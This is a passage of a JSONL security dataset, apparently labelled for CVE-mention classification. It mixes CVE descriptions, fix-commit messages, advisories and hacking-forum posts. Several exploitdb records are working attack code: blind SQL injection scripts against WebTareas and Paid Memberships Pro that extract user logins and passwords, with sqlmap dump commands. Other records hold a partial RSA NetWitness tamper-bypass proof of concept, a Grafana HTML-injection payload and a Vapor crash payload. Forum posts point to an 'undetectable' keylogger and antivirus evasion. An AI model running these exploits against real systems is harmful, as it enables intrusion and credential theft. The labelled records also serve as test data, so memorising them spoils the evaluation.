CVE-2022-2284\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0017: accessing memory beyond the end of the line\n\nProblem: Accessing memory beyond the end of the line.\nSolution: Stop Visual mode when closing a window.", "source": "cvefixes", "timestamp": "2022-07-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6c29b50cf52d481e0b8f", "text": "CVE: CVE-2022-0243\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in NuGet OrchardCore.Application.Cms.Targets prior to 1.2.2.'}]\n\nFix commit: Fix localization and sanitization usages (#11034)", "source": "cvefixes", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c9c7737ab99bf0a459bc", "text": "Hi Wathix, Can you help with this please? I’ve been stuck on this assessment for a week now. I would greatly appreciate it.", "source": "hackthebox", "timestamp": "2023-04-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "893dbfcc3c6bfb922589", "text": "RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution\n\n# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution\n[+] Credits: John Page (aka hyp3rlinx)\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt\n[+] twitter.com/hyp3rlinx\n[+] ISR: ApparitionSec\n\n[Vendor]\nRSA Security\nwww.netwitness.com\n\n\n[Product]\nNetWitness Endpoint EDR Agent\n\nThe RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility\ninto their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly\ndetecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.\n\n\n[Vulnerability Type]\nIncorrect Access Control / Code Execution\n\n\n[CVE Reference]\nCVE-2022-47529\n\n\n[Security Issue]\nCVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands.\n\nInsecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local\nand admin Windows user accounts to modify the endpoint agent service configuration:\nto either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.\n\nInterestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report.\n\nSHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d\nLANDeskService.exe\n\n\n[Severity]\nCritical\n\n\n[Impact(s)]\nDenial-of-Service\nArbitrary Code Execution\n\n\n[Attack Vector]\nTo exploit, open handle to memory objects held by the endpoint agent,\nmodify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group\n\n\n[Affected Product Code Base]\nAll versions prior to v12.2\n\n\n[Network Access]\nLocal\n\n\n[References]\nhttps://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935\n\n\n[Vuln Code Block]:\n00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p\n.text:00000001400F7B10 ; sub_14013BA50+19?p\n.text:00000001400F7B10 ; DATA XREF: ...\n.text:00000001400F7B10 push rbx\n.text:00000001400F7B12 sub rsp, 20h\n.text:00000001400F7B16 mov rbx, rcx\n.text:00000001400F7B19 test rcx, rcx\n.text:00000001400F7B1C jz short loc_1400F7B5C\n.text:00000001400F7B1E call cs:InitializeCriticalSection\n.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection\n.text:00000001400F7B28 call cs:InitializeCriticalSection\n.text:00000001400F7B2E mov edx, 1 ; bManualReset\n.text:00000001400F7B33 xor r9d, r9d ; lpName\n.text:00000001400F7B36 mov r8d, edx ; bInitialState\n.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes\n.text:00000001400F7B3B call cs:CreateEventW\n.text:00000001400F7B41 mov [rbx+50h], rax\n.text:00000001400F7B45 mov dword ptr [rbx+58h], 0\n.text:00000001400F7B4C test rax, rax\n.text:00000001400F7B4F jz short loc_1400F7B5C\n\n\n\n[Exploit/POC]\n\"RSA_NetWitness_Exploit.c\"\n\n#include \"windows.h\"\n#include \"stdio.h\"\n#include \"accctrl.h\"\n#include \"aclapi.h\"\n\n#define OPEN_ALL_ACCESS 0x1F0003\n\n/*\nRSA NetWitness EDR Endpoint Agent\nTamper Protection Bypass / EoP Code Execution\nRSA NetWitness.msi --> NWEAgent.exe\nMD5: c0aa7e52cbf7799161bac9ebefa38d49\n\nExpected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.\nAc", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "07d7210efd01c67d3555", "text": "CVE: CVE-2022-1808\n\n[{'lang': 'en', 'value': 'Execution with Unnecessary Privileges in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(core): verify user exists", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "724f72ef775f77add3c9", "text": "WebTareas 2.4 - Blind SQLi (Authenticated)\n\n# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)\n# Date: 04/20/2022\n# Exploit Author: Behrad Taher\n# Vendor Homepage: https://sourceforge.net/projects/webtareas/\n# Version: < 2.4p3\n# CVE : CVE-2021-43481\n\n#The script takes 3 arguments: IP, user ID, session ID\n#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i\n\nimport requests, time, sys\nfrom bs4 import BeautifulSoup\nip = sys.argv[1]\nid = sys.argv[2]\nsid = sys.argv[3]\n\ndef sqli(column):\n print(\"Extracting %s from user with ID: %s\\n\" % (column,id))\n extract = \"\"\n for i in range (1,33):\n #This conditional statement will account for variable length usernames\n if(len(extract) < i-1):\n break\n for j in range(32,127):\n injection = \"SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);\" % (column,i,j)\n url = \"http://%s/approvals/editapprovaltemplate.php?id=1\" % ip\n GET_cookies = {\"webTareasSID\": \"%s\" % sid}\n r = requests.get(url, cookies=GET_cookies)\n #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token\"\n token = BeautifulSoup(r.text,features=\"html.parser\").find('input', {'name':'csrfToken'})['value']\n #Because this is an authenticated vulnerability we need to provide a valid session token\n POST_cookies = {\"webTareasSID\": \"%s\" % sid}\n POST_data = {\"csrfToken\": \"%s\" % token, \"action\": \"update\", \"cd\": \"Q\", \"uq\": \"%s\" % injection}\n start = time.time()\n requests.post(url, cookies=POST_cookies, data=POST_data)\n end = time.time() - start\n if end > 5:\n extract += chr(j)\n print (\"\\033[A\\033[A\")\n print(extract)\n break\n#Modularized the script for login and password values\nsqli(\"login\")\nsqli(\"password\")", "source": "exploitdb", "timestamp": "2022-05-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3b9f4177655ef562b0b5", "text": "[Unknown] [CVE-2023-27539] Possible Denial of Service Vulnerability in Rack’s header parsing\n\nI made a report and patch at https://hackerone.com/reports/1887373 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27539-possible-denial-of-service-vulnerability-in-racks-header-parsing/82466\n\n> There is a denial of service vulnerability in the header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27539.\n\n## Impact\n\n> Carefully crafted input can cause header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse headers using Rack (virtually all Rails applications) are impacted.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d873e2bd722dc47b6b00", "text": "CVE: CVE-2022-23572\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, TensorFlow can fail to specialize a type during shape inference. This case is covered by the `DCHECK` function however, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the `ValueOrDie` line. This results in an assertion failure as `ret` contains an error `Status`, not a value. In the second case we also get a crash due to the assertion failure. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, and TensorFlow 2.6.3, as these are also affected and still in supported range.'}]\n\nFix commit: Properly handle the case where `SpecializeType()` returns an error `Status`.\n\nIf the error case in `SpecializeType()` is reached, then we would get a crash when trying to access the value of an errorenous `StatusOr` object\n\nPiperOrigin-RevId: 408380069\nChange-Id: If3c3fc876dcf9384d5ec7a4985adc68c23ea7318", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5ae074b93debd9c62101", "text": "CVE: CVE-2022-23080\n\n[{'lang': 'en', 'value': 'In directus versions v9.0.0-beta.2 through 9.6.0 are vulnerable to server-side request forgery (SSRF) in the media upload functionality which allows a low privileged user to perform internal network port scans.'}]\n\nFix commit: Add support for import ip deny list (#12025)\n\n* Add support for import ip deny list\r\n\r\n* Fix typo", "source": "cvefixes", "timestamp": "2022-06-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ee5a2d9affe7a593d0ab", "text": "CVE: CVE-2022-29530\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is stored XSS in the galaxy clusters.'}]\n\nFix commit: fix: [security] XSS in galaxy clusters\n\n- fixed a stored XSS in the galaxy clusters\n\n- as reported by Dawid Czarnecki of Zigrin Security on behalf of the Luxembourg Army", "source": "cvefixes", "timestamp": "2022-04-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b9d84bad1a6ff6d7c781", "text": "Now that anti virus scanners respond quickly to every newly created backdoor, you need to be creative and go through the back door. Here’s an example of how discord is used to access someone else’s computer: GitHub - 3ct0s/discord-keylogger: Undetectable Keylogger that reports to Discord", "source": "hackersploit", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8ba9b2b0179f6acd3315", "text": "CVE: CVE-2022-31155\n\n[{'lang': 'en', 'value': 'Sourcegraph is an opensource code search and navigation engine. In Sourcegraph versions before 3.41.0, it is possible for an attacker to delete other users’ saved searches due to a bug in the authorization check. The vulnerability does not allow the reading of other users’ saved searches, only overwriting them with attacker-controlled searches. The issue is patched in Sourcegraph version 3.41.0. There is no workaround for this issue and updating to a secure version is highly recommended.'}]\n\nFix commit: Saved searches: fix update permissions (#36674)", "source": "cvefixes", "timestamp": "2022-08-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "77a60a238902c7165ce4", "text": "Recruitment for battlegrounds and overall CTF competitions (on and off platform)\n\ngreetings hack fam! Ive seen other posts regarding teams and recruitment, figured I’d giveit a try. I started a new team \" strataGEM\" . I would like to use the platform and the team set up to build a small group of enthusiasts that will target certain machines upon release as a team in an organized effort. Battlegrounds as well. I would love to be able to be a part of a team that live chats as we hack and attack boxes with assigned roles according to our strengths and weaknesses. I do not care about current skill level for the most part however if you find yourself wanting to ask… “whats the first step to becoming a hacker” … keep learning my friend, the journey itself is a beautiful thing. More than anything I would like to create a safe competitive space for like minded enthusiasts and make some alliances in the hacking world. Hope to hear from some of you! If there is a team that functions in the way that I havae described and would like to possibly take on a new member id be down for that as well.", "source": "hackthebox", "timestamp": "2022-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0106b88f929f6d55a541", "text": "debian - How to show the number of installed packages - Unix & Linux Stack Exchange this should help", "source": "hackthebox", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a92b6daed02de98ec1ce", "text": "Possible shell escape sequence injection vulnerability in Rack\n\n[Severity: CRITICAL]\n\nThere is a possible shell escape sequence injection vulnerability in the Lint\nand CommonLogger components of Rack. This vulnerability has been assigned the\nCVE identifier CVE-2022-30123.\n\nVersions Affected: All.\nNot affected: None\nFixed Versions: 2.0.9.1, 2.1.4.1, 2.2.3.1\n\n## Impact\nCarefully crafted requests can cause shell escape sequences to be written to\nthe terminal via Rack's Lint middleware and CommonLogger middleware. These\nescape sequences can be leveraged to possibly execute commands in the victim's\nterminal.\n\nImpacted applications will have either of these middleware installed, and\nvulnerable apps may have something like this:\n\n```\nuse Rack::Lint\n```\n\nOr\n\n```\nuse Rack::CommonLogger\n```\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\n## Workarounds\nRemove these middleware from your application\n", "source": "github_advisory", "timestamp": "2022-05-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "62b92db4a3a3bfbfb120", "text": "Mitmproxy hacking plugin\n\nI stop using burp long time a go because it is closed source, then zap lately because I just can’t stand java, so I found for what I need (just a HTTP interceptor that I can modify information and pause/release) mitmproxy to be the perfect tool and very hackable and open source. So started to write a plugin to start using other tools inside it like gobuster, nikto, grab links and comments etc… Here is the pluging and here is the main site. I will be adding more features as I go, feel free to submit patches. Happy Hacking", "source": "hackthebox", "timestamp": "2023-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4674ea6eb38899bb353b", "text": "Can somone help me with “What filter will allow me to see traffic coming from or destined to the host with an ip of 10.10.20.1” i tried every possible answer i could think of Q1 Tcpdump packet filtering", "source": "hackthebox", "timestamp": "2022-08-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1a43cbbf589a84d9252e", "text": "I finally solved! and after reading the forum posts, some of them may lead to confusion. You don’t need to do any transformation to the result of the register, it is the value that has to be. It is not necessary to use any function to write the values on the screen, in fact, the printf function can lead you to confusion with its results. Debug, and debug again, what is the value of the rdx register before the xor? and after? is there something wrong with any of the values?", "source": "hackthebox", "timestamp": "2022-11-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e58bf9c20c3e0b77e2b8", "text": "I’ve solved most of JET but am stuck on Elasticity, anyone know how to fix it? You can also DM me if you have problems with the previous flags", "source": "hackthebox", "timestamp": "2023-04-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4a8147387248a006e321", "text": "CVE: CVE-2022-31019\n\n[{'lang': 'en', 'value': 'Vapor is a server-side Swift HTTP web framework. When using automatic content decoding an attacker can craft a request body that can make the server crash with the following request: `curl -d \"array[_0][0][array][_0][0][array]$(for f in $(seq 1100); do echo -n \\'[_0][0][array]\\'; done)[string][_0]=hello%20world\" http://localhost:8080/foo`. The issue is unbounded, attacker controlled stack growth which will at some point lead to a stack overflow and a process crash. This issue has been fixed in version 4.61.1.'}]\n\nFix commit: Merge pull request from GHSA-qvxg-wjxc-r4gg\n\n* Add test for crash\n\n* The sensible option\n\n* Crude fix\n\n* Throw an error if we hit a nesting limit\n\n* Catch error in test", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4f450a803a167d7e677e", "text": "Yes for sure it’s amazing tools with metasploit. Tested x86/shikata_ga_nai but it’s still not FUD. Maybe you can write name on the encoder which will do the job", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fda5f687db6fadfba6cd", "text": "CVE: CVE-2022-0729\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 8.2.4440.'}]\n\nFix commit: patch 8.2.4440: crash with specific regexp pattern and string\n\nProblem: Crash with specific regexp pattern and string.\nSolution: Stop at the start of the string.", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c20fd0fec57f8fa88dcb", "text": "how to pentest a CISCO ISR 4331 with routersploit, or any other tool\n\nHey there I’m trying to pentest a CISCO ISR 4331 using routersploit. But this model of router is not on the list of routers routersploit has available to exploit. when I try running routersploit running the autopwn on this router I just get the following results. All creds and routers “not vulnerable” except these ones below. “IP” Could not verify exploitability : http exploits/routers/asus/asuwart_lan_rce http exploits/routers/shuttle/915wm_dns_change http exploits/routers/netgear/dgn2200-dnslookup_cgi_rce custom/tcp exploits/routers/cisco/catalyst_2960_rocem http exploits/routers/cisco/secure_acs_bypass http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change http exploits/routers/dlink/dsl_2640b_dns_change http exploits/routers/dlink/dsl_2740r_dns_change custom/udp exploits/routers/dlink/dir_815_850l_rce http exploits/routers/billion/billion_5200w_rce http exploits/routers/3com/officeconnect_rce I’m having trouble finding YouTube video or manual that explain how to properly investigate these links that cannot be verified. I also get mixed signals from these links even they they are not the same models as my router. After exploring all the options while writing this question Im pretty sure none if them can be used to pen test a CISCO 4331 ISR so any links or advice on how i can do this with routersploit or any other program would be appreciated.", "source": "hackersploit", "timestamp": "2022-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "458c3919ba715231ad61", "text": "CVE: CVE-2022-0838\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.5.10.'}]\n\nFix commit: replace html() with text\n\n+ 2 small problems on add / edit database page", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "569014f70baa0938f576", "text": "Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n\n#!/usr/bin/env python\n# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n# Exploit Author: r3nt0n\n# CVE: CVE-2023-23488\n# Date: 2023/01/24\n# Vulnerability discovered by Joshua Martinelle\n# Vendor Homepage: https://www.paidmembershipspro.com\n# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip\n# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9\n# Version: < 2.9.8\n# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7\n#\n# Running this script against a WordPress instance with Paid Membership Pro plugin\n# tells you if the target is vulnerable.\n# As the SQL injection technique required to exploit it is Time-based blind, instead of\n# trying to directly exploit the vuln, it will generate the appropriate sqlmap command\n# to dump the whole database (probably very time-consuming) or specific chose data like\n# usernames and passwords.\n#\n# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress\n\nimport sys\nimport requests\n\ndef get_request(target_url, delay=\"1\"):\n payload = \"a' OR (SELECT 1 FROM (SELECT(SLEEP(\" + delay + \")))a)-- -\"\n data = {'rest_route': '/pmpro/v1/order',\n 'code': payload}\n return requests.get(target_url, params=data).elapsed.total_seconds()\n\nprint('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\\n')\nif len(sys.argv) != 2:\n print('Usage: {} '.format(\"python3 CVE-2023-23488.py\"))\n print('Example: {} http://127.0.0.1/wordpress'.format(\"python3 CVE-2023-23488.py\"))\n sys.exit(1)\n\ntarget_url = sys.argv[1]\ntry:\n print('[-] Testing if the target is vulnerable...')\n req = requests.get(target_url, timeout=15)\nexcept:\n print('{}[!] ERROR: Target is unreachable{}'.format(u'\\033[91m',u'\\033[0m'))\n sys.exit(2)\n\nif get_request(target_url, \"1\") >= get_request(target_url, \"2\"):\n print('{}[!] The target does not seem vulnerable{}'.format(u'\\033[91m',u'\\033[0m'))\n sys.exit(3)\nprint('\\n{}[*] The target is vulnerable{}'.format(u'\\033[92m', u'\\033[0m'))\nprint('\\n[+] You can dump the whole WordPress database with:')\nprint('sqlmap -u \"{}/?rest_route=/pmpro/v1/order&code=a\" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))\nprint('\\n[+] To dump data from specific tables:')\nprint('sqlmap -u \"{}/?rest_route=/pmpro/v1/order&code=a\" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))\nprint('\\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')\nprint('sqlmap -u \"{}/?rest_route=/pmpro/v1/order&code=a\" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))\nsys.exit(0)", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7df81826e6a1240ccd0b", "text": "Symfony Arbitrary PHP code Execution\n\n[Severity: HIGH]\n\nSymfony 2.0.x before 2.0.22, 2.1.x before 2.1.7, and 2.2.x remote attackers to execute arbitrary PHP code via a serialized PHP object to the (1) Yaml::parse or (2) Yaml\\Parser::parse function, a different vulnerability than CVE-2013-1348.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "53b91b44a9cd6a77a4eb", "text": "Yes please if you don’t mind helping. I’ve tried probably a hundred different things with this being the most recent:", "source": "hackthebox", "timestamp": "2023-04-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b629986474cb294499d0", "text": "Making WIFI Hacking Great again, stimulating the WIFI-Hacking Community 2022\n\nI have enjoyed the concept of Wifi Hacking but it seems we have hit a wall. I’m gonna be honest and and say, methods and tutorials for WPS Pixie Attacks, Airgeddon, Wifite, Aircrack, Dictionary attacks through hashing even has become pretty over saturated over time and has led to little to no success. Due to this issue below I will put my thoughts on the current attacks/methods I more or less understand with an additional comment to think about to make better posts for the future so it does not become clutter over time and then something on Frag Attacks in regards to Wifi-Hacking which has caught my eye. PS: The comments are aimed toward obtaining Wifi Passwords. I understand pretty much all the tools mentioned do their job and do it well. Its about the “Passwords” part of Wifi-Hacking that seems a bit empty and stagnate lately, In My Opinion. Dictionary attacks - Takes too long even if hashed. What kind of recon would one have to do to help a dictionary attack be better prepared to Bruteforce. WPS attacks - Besides bashing on the fact that with every 6-12 months WPS attack success feels like it will hit 0% eventually excluding demo tests, You can have a Network say WPS enabled but if it’s not configured how would you know? How do you properly fine tune your wps pin attacks so you don’t get timed out as much or worse locked out or strategies around it. (While technically this information is out they don’t make it easy to understand and it’s the same as nothing.) Not mentioning fixing glitches or maybe legit reasons why common wps cracking scripts are always stuck on 1 pin testing it over and over. Evil Twin Attack - Cool and all until you realize that the “victim” has to go through a login page and convince them which even them which is literally only for clues… it’s especially difficult that even if they log a possible password or… a kind of credentials not having internet makes it suspicious but there’s a way around that. ARP Poisoning Relay attack - Nearly the same results as the Evil Twin attack but, This is easily detectable on certain networks and you could get flagged/blocked. Man In The Middle Attack ^ Krack Attack - nearly the same thing… ARP related, but Relaying a network without the SSL Strip in URL. -This is not really for Wifi passwords though Mac changer - Usually used only for Wifi with Login pages, Paid wifi… and things of that nature but slap in some regular WEP/WPA/WPA2/WPA3 password and Poof method is terrible. -Although… there is some theoretical usage of Authentication with this on regular WIFI networks but I have not seen any solid documentation yet. Now for something I would like to see on user posted experiments and tutorial steps for achieved results and how to stay anonymous also while performing such attacks as always with every attack (Usually people do not make their tutorials intertwined with those critical steps for the real world.) Frag Attacks: What Are Wi-Fi Frag Attacks and How Can You Protect Against Them? Short for “fragmentation” and “aggregation”, Frag attacks allow hackers to bypass firewalls to inject code into Wi-Fi traffic. A new set of vulnerabilities known as Frag attacks have been discovered in Wi-Fi-enabled devices. A website that rather you clicking on my link I rather just search the necessary keywords on your favorite web browser to get to the same place to reduce risk in general for you as a user. https://www.fragattacks.com/ This website has a ton of documentation of this kind of attack and recently I got an understanding on the attack. Even though this is a great source and Youtube has 2-3 videos on this attack by the same person, It’s more of a demo where not everything is explained in the best way possible. Simply because it’s a demo, not a tutorial. This is their github: GitHub - vanhoefm/fragattacks -same warning in regards to the link above… I attempted to “install” everything I needed but it may be the high level vocabulary of Linux related devices and interfaces and directories and… d", "source": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ae6009aa14d6d6247726", "text": "Grafana <=6.2.4 - HTML Injection\n\n# Exploit Title: Grafana <=6.2.4 - HTML Injection\n# Date: 30-06-2019\n# Exploit Author: SimranJeet Singh\n# Vendor Homepage: https://grafana.com/\n# Software Link: https://grafana.com/grafana/download/6.2.4\n# Version: 6.2.4\n# CVE : CVE-2019-13068\n\nThe uri \"public/app/features/panel/panel_ctrl.ts\" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)\n\nPayload used -

    Hello

    ", "source": "exploitdb", "timestamp": "2023-03-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "386a7346942c0b5a8df4", "text": " Installing and working with hcxdumptool\n\nIt is easy to understand I am a newbie, so please I need you to understand. First I am trying to get how the installation process of this tool must be done. Linux Parrot 6.1.0 Parrot 5.3 Security Edition Hi I was following specific indications to install hxcdumptool but there are some differences. There is a version installed by default on ParrotOS which is the 6.0.2-1+b1 but if I run the command line the program does not catch anything Ok first it is recommended to clone as described: GitHub GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices. Small tool to capture packets from wlan devices. Contribute to ZerBea/hcxdumptool development by creating an account on GitHub. git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make The installation is done with no problems but when I enter the command *sudo hcxdumptool -i wlxxx -o dumpfile pcapng -active_beacon-enable_status=15 it shows the message hcxdumptool: invalid option --o Ive done it before with the same laptop but I had a problem and I don't remember what was the procedure I followed to do the installation, I think the problem is with the hcxtools package, if I look in the Synaptic Package Manager it shows me the hcxtools version 6.0.2-1+b1 and what I need is a more recent one. By the way the hcxdumptools I installed is the 6.3.2-1. The hcxdumptool and the hcxtools showed in the Synaptic Manager are not installed. If you can help me to find the right procedure to install this tool, thank you.", "source": "parrotsec", "timestamp": "2023-11-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f5d3b1cfd24095ddd3d2", "text": "CVE: CVE-2022-34927\n\n[{'lang': 'en', 'value': 'MilkyTracker v1.03.00 was discovered to contain a stack overflow via the component LoaderXM::load. This vulnerability is triggered when the program is supplied a crafted XM module file.'}]\n\nFix commit: Fix possible stack corruption with XM instrument headers claiming a size of less than 4\n\nCloses #275", "source": "cvefixes", "timestamp": "2022-08-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cc88250b20bf93635fe3", "text": "CVE: CVE-2022-1815\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.'}]\n\nFix commit: 18.1.2 release", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "eb0d8904e764d10bcf96", "text": "Analytical problems\n\nhi guys! the machine “Analytical” always redirects to the link: https://html.design I think it’s not the direction of the training machine, correct me if I’m wrong… i hope you can help me", "source": "hackthebox", "timestamp": "2023-12-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a12d66d78571561fea54", "text": "Nokogiri updates packaged libxml2 to v2.10.4 to resolve multiple CVEs\n\n[Severity: MEDIUM]\n\n### Summary\n\nNokogiri v1.14.3 upgrades the packaged version of its dependency libxml2 to [v2.10.4](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.4) from v2.10.3.\n\nlibxml2 v2.10.4 addresses the following known vulnerabilities:\n\n- [CVE-2023-29469](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29469): Hashing of empty dict strings isn't deterministic\n- [CVE-2023-28484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28484): Fix null deref in xmlSchemaFixupComplexType\n- Schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK\n\nPlease note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.14.3`, and only if the _packaged_ libraries are being used. If you've overridden defaults at installation time to use _system_ libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements.\n\n\n### Mitigation\n\nUpgrade to Nokogiri `>= 1.14.3`.\n\nUsers who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 `>= 2.10.4` which will also address these same issues.\n\n\n### Impact\n\nNo public information has yet been published about the security-related issues other than the upstream commits. Examination of those changesets indicate that the more serious issues relate to libxml2 dereferencing NULL pointers and potentially segfaulting while parsing untrusted inputs.\n\nThe commits can be examined at:\n\n- [[CVE-2023-29469] Hashing of empty dict strings isn't deterministic (09a2dd45) · Commits · GNOME / libxml2 · GitLab](https://gitlab.gnome.org/GNOME/libxml2/-/commit/09a2dd453007f9c7205274623acdd73747c22d64)\n- [[CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType (647e072e) · Commits · GNOME / libxml2 · GitLab](https://gitlab.gnome.org/GNOME/libxml2/-/commit/647e072ea0a2f12687fa05c172f4c4713fdb0c4f)\n- [schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK (4c6922f7) · Commits · GNOME / libxml2 · GitLab](https://gitlab.gnome.org/GNOME/libxml2/-/commit/4c6922f763ad958c48ff66f82823ae21f2e92ee6)\n", "source": "github_advisory", "timestamp": "2023-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ebdbd9f8c68ec1b950df", "text": "Thinfinity VirtualUI 2.5.26.2 - Information Disclosure\n\nExploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure\nDate: 18/01/2022\nExploit Author: Daniel Morales\nVendor: https://www.cybelesoft.com \nSoftware Link: https://www.cybelesoft.com/thinfinity/virtualui/ \nVersion vulnerable: Thinfinity VirtualUI < v2.5.26.2\nTested on: Microsoft Windows\nCVE: CVE-2021-46354\n\nHow it works\nExternal service interaction arises when it is possible to 